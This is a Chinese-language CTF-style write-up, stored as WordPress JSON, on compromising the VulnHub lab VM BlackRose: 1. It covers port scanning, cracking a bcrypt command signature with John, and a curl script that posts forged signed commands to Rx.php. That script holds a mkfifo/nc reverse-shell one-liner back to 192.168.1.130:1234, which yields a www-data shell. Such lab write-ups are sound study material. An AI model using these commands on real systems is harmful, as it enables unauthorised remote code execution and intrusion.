{"id":107,"date":"2024-04-07T17:38:19","date_gmt":"2024-04-07T09:38:19","guid":{"rendered":"http:\/\/xiyu12.top\/?p=107"},"modified":"2024-04-07T17:38:19","modified_gmt":"2024-04-07T09:38:19","slug":"blackrose","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=107","title":{"rendered":"blackrose"},"content":{"rendered":"\n<ul class=\"wp-block-list\">\n<li><strong>Name<\/strong>: BlackRose: 1<\/li>\n\n\n\n<li><strong>Date release<\/strong>: 12 Jul 2020<\/li>\n\n\n\n<li><strong>Author<\/strong>:&nbsp;<a href=\"https:\/\/www.vulnhub.com\/author\/badlamer,711\/\">BadLamer<\/a><\/li>\n\n\n\n<li><strong>Series<\/strong>:&nbsp;<a href=\"https:\/\/www.vulnhub.com\/series\/blackrose,337\/\">BlackRose<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>BlackRose.ova<\/strong>&nbsp;<small>(Size: 2.5 GB)<\/small><\/li>\n\n\n\n<li><strong>Download<\/strong>:&nbsp;<a href=\"https:\/\/drive.google.com\/drive\/folders\/18kNgJTqEXpDXO8AH1UZnyOJWpzzD5a0P\">https:\/\/drive.google.com\/drive\/folders\/18kNgJTqEXpDXO8AH1UZnyOJWpzzD5a0P<\/a><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e00\u3001\u4fe1\u606f\u6536\u96c6<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7aef\u53e3\u670d\u52a1\u4fe1\u606f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo nmap -sn 192.168.1.0\/24      192.168.1.21<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo nmap -sT &#8211;min-rate 10000 -p- 192.168.1.21 -o st<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-07 17:37 CST\nNmap scan report for 192.168.1.21\nHost is up (0.00052s latency).\nNot shown: 65532 closed tcp ports (conn-refused)\nPORT     STATE SERVICE\n22\/tcp   open  ssh\n80\/tcp   open  http\n3306\/tcp open  mysql\nMAC Address: 00:0C:29:40:1D:48 (VMware)\n\nNmap done: 1 IP address (1 host up) scanned in 13.24 seconds<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">sudo nmap -sC -sV -p 22,80,3306  192.168.1.21 -o  sc <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">sudo nmap &#8211;script=vuln -p 22,80,3306 192.168.1.21 -o vuln<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>2<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">web\u4fe1\u606f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">gobuster dir -u http:\/\/192.168.1.21 &#8211;wordlist=\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x .txt,.zip,.html,.php -o 1.txt<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n&#91;+] Url:                     http:\/\/192.168.1.21\n&#91;+] Method:                  GET\n&#91;+] Threads:                 10\n&#91;+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n&#91;+] Negative Status codes:   404\n&#91;+] User Agent:              gobuster\/3.6\n&#91;+] Extensions:              txt,zip,html,php\n&#91;+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/images               (Status: 301) &#91;Size: 313] &#91;--> http:\/\/192.168.1.21\/images\/]\n\/.html                (Status: 403) &#91;Size: 277]\n\/.php                 (Status: 403) &#91;Size: 277]\n\/img                  (Status: 301) &#91;Size: 310] &#91;--> http:\/\/192.168.1.21\/img\/]\n\/login.php            (Status: 200) &#91;Size: 1463]\n\/register.php         (Status: 200) &#91;Size: 1559]\n\/index.php            (Status: 302) &#91;Size: 0] &#91;--> login.php]\n\/header.php           (Status: 200) &#91;Size: 21]\n\/footer.php           (Status: 200) &#91;Size: 21]\n\/css                  (Status: 301) &#91;Size: 310] &#91;--> http:\/\/192.168.1.21\/css\/]\n\/database.php         (Status: 302) &#91;Size: 0] &#91;--> 404.php]\n\/js                   (Status: 301) &#91;Size: 309] &#91;--> http:\/\/192.168.1.21\/js\/]\n\/logout.php           (Status: 302) &#91;Size: 0] &#91;--> 404.php]\n\/404.php              (Status: 200) &#91;Size: 21]\n\/vendors              (Status: 301) &#91;Size: 314] &#91;--> http:\/\/192.168.1.21\/vendors\/]\n\/bootstrap            (Status: 301) &#91;Size: 316] &#91;--> http:\/\/192.168.1.21\/bootstrap\/]\n\/.php                 (Status: 403) &#91;Size: 277]\n\/.html                (Status: 403) &#91;Size: 277]\n\/RL.php               (Status: 302) &#91;Size: 0] &#91;--> 404.php]\n\/server-status        (Status: 403) &#91;Size: 277]\n\/Rx.php               (Status: 302) &#91;Size: 0] &#91;--> 404.php]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e8c\u3001\u83b7\u5f97\u7acb\u8db3\u70b9<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee\u7f51\u9875 http:\/\/192.168.1.21   \u53ef\u4ee5\u770b\u5230\u767b\u9646\u754c\u9762   \/login     \u540c\u65f6\u6709\u4e00\u4e2a\u6ce8\u518c\u70b9sign up<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-07-174810-1024x285.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-07-174810-1024x285.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-111\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee  <a href=\"http:\/\/192.168.1.21\">http:\/\/192.168.1.21<\/a>\/register.php  \u6ce8\u518c\u4e00\u4e2a\u7528\u6237     \u7136\u540e\u767b\u9646<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u53d1\u73b0  admin\u7528\u6237\u65e0\u6cd5\u6ce8\u518c \uff08\u5df2\u7ecf\u5b58\u5728\uff09  \u8fdb\u53bb\u4ee5\u540e\u53d1\u73b0\u4e00\u4e2a \u53ef\u4ee5 \u6267\u884c\u547d\u4ee4\u7684\u5730\u65b9\uff08\u4f46\u662f\u6ca1\u6709\u6743\u9650\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/image-9-1024x387.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"387\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/image-9-1024x387.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-112\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h6 class=\"wp-block-heading\"><strong>\u4f7f\u7528 \u6570\u7ec4\u7ed5\u8fc7php  \u51fd\u6570<\/strong><\/h6>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-07-180330.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-07-180330.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-113\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u767b\u9646\u8fdb\u6765\u4e4b\u540e  \u53d1\u73b0\u53ef\u4ee5\u6267\u884c  whoami  \u4f46\u662f\u5176\u4ed6\u7684\u547d\u4ee4 \u6267\u884c\u5931\u8d25<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5e76\u4e14\u4f1a\u65f6\u4e0d\u65f6\u5730\u663e\u793a\u8d85\u65f6  <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-07-180456-1024x349.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-07-180456-1024x349.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-114\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528F12  \u67e5\u770b\u5f00\u53d1\u8005\u754c\u9762    \u53ef\u4ee5\u770b\u5230\u547d\u4ee4\u6267\u884c\u65f6  \u53d1\u4e86\u4e00\u4e2a\u5305   http:\/\/192.168.1.21\/Rx.php  \u4f7f\u7528post \u65b9\u5f0f\u53c2\u6570\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>signature\t\"$2y$10$6VJPFCWDVzHO0aGZoAIdZOGbdQ28AUhRvpya5sNcDmplkjws2JKCK\"\ncommand\t\"whoami\"\nindexcsrf\t\"bfa6cfdd7aab15c49d5fbb7aa00082843f77586f0e161a8c35ce5a375fd8867f\"<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-07-180957-1024x573.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-07-180957-1024x573.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-116\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e09\u4e2a\u53c2\u6570   \u4e00\u4e2a\u547d\u4ee4 \u540d\u79f0   \u4e00\u4e32\u52a0\u5bc6\u5b57\u7b26  \u7b7e\u540d   \u8fd8\u6709\u4e00\u4e32\u5b57\u7b26\u662ftoken   \u731c\u6d4b\u7b7e\u540d\u548c\u547d\u4ee4 \u76f8\u5bf9\u5e94<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528john \u7834\u89e3<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">john &#8211;wordlist=.\/p .\/h<br>Using default input encoding: UTF-8<br>Loaded 1 password hash (bcrypt [Blowfish 32\/64 X3])<br>Cost 1 (iteration count) is 1024 for all loaded hashes<br>Press &#8216;q&#8217; or Ctrl-C to abort, almost any other key for status<br>Warning: Only 1 candidate left, minimum 3 needed for performance.<br>whoami (?)<br>1g 0:00:00:00 DONE (2024-04-07 18:25) 7.692g\/s 7.692p\/s 7.692c\/s 7.692C\/s whoami<br>Use the &#8220;&#8211;show&#8221; option to display all of the cracked passwords reliably<br>Session completed.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-07-182133-1024x624.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-07-182133-1024x624.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-117\" style=\"width:840px;height:auto\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528\u5728\u7ebf\u7f51\u7ad9 \u5236\u9020\u7b7e\u540d  \u5e76\u4f7f\u7528\u811a\u672c\u8bbf\u95ee Rx.php \u83b7\u5f97\u547d\u4ee4\u6267\u884c\u7684\u70b9<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/image-11-1024x362.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"362\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/image-11-1024x362.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-118\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>cat br.sh \ncurl http:\/\/192.168.1.21\/index.php -H \"Cookie: PHPSESSID=pinmglcigs1odqe35dhgsm5vgd\"|grep  hidden\\\"  | cut -d \"\\\"\" -f 6 > br  \nscrf=`cat br`\necho ${scrf}\necho ${1}\necho ${2}\ncurl  -X POST http:\/\/192.168.1.21\/Rx.php -H \"Cookie: PHPSESSID=pinmglcigs1odqe35dhgsm5vgd\"   --data \"signature=${1}&amp;command=${2}&amp;indexcsrf=${scrf}\"\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6267\u884c\u7ed3\u679c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/br.sh \"\\$2a\\$10\\$8VFm2OQX83UJ.3AMDT0lr.RgvM3GitSrz3FCpLnUbfursPlj9bf02\" \"pwd\"\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100  3606  100  3606    0     0   308k      0 --:--:-- --:--:-- --:--:--  320k\ne8193300c775c57aa6e190410ecccd671d1908a91b5f8938e99bf34634a9b4e5\n$2a$10$8VFm2OQX83UJ.3AMDT0lr.RgvM3GitSrz3FCpLnUbfursPlj9bf02\npwd\n{\"ok\":\"\\\/var\\\/www\\\/html\\n\"}   <\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528 \u53cd\u5f39shell \u547d\u4ee4\uff1a rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&amp;1|nc 192.168.1.130 1234 >\/tmp\/f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u6ce8\u610f<\/strong>\uff1a\u8fd9\u91cc\u6211\u62a5\u9519\u4e86\u597d\u591a\u6b21    \u53ef\u4ee5\u5728\u7f51\u9875\u4e2d\u63d0\u4ea4\u7136\u540e  \u628a\u8bf7\u6c42\u53c2\u6570\u590d\u5236\u8fc7\u6765  \u8fd9\u6837\u6bd4\u8f83\u7a33\u59a5<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">cat brr.sh<br>curl http:\/\/192.168.1.21\/index.php -H &#8220;Cookie: PHPSESSID=pinmglcigs1odqe35dhgsm5vgd&#8221;|grep hidden\\&#8221; | cut -d &#8220;\\&#8221;&#8221; -f 6 &gt; br<br>scrf=<code>cat br<\/code><br>echo ${scrf}<br>echo ${1}<br>echo ${2}<br>curl -X POST http:\/\/192.168.1.21\/Rx.php -H &#8220;Cookie: PHPSESSID=pinmglcigs1odqe35dhgsm5vgd&#8221; &#8211;data &#8220;signature=%242a%2410%24.SzScvBvZ%2FtL39uMBhT4nuumnZ8oGles3XvU59RaT2ic.31Rs85gO&amp;command=rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3B%2Fbin%2Fsh+-i+2%3E%261+%3C%2Ftmp%2Ff%7Cnc+192.168.1.130+1234+%3E%2Ftmp%2Ff&amp;indexcsrf=${scrf}&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u83b7\u5f97shell:www-data<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u63d0\u6743<\/h2>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u3001\u4fe1\u606f\u6536\u96c6 \u7aef\u53e3\u670d\u52a1\u4fe1\u606f sudo nmap -sn 192.168.1.0\/24 192.168.1.21 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[22,23,36,40],"class_list":["post-107","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-bcrypt","tag-curl","tag-hashcat","tag-join"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/107","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=107"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/107\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=107"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=107"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=107"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}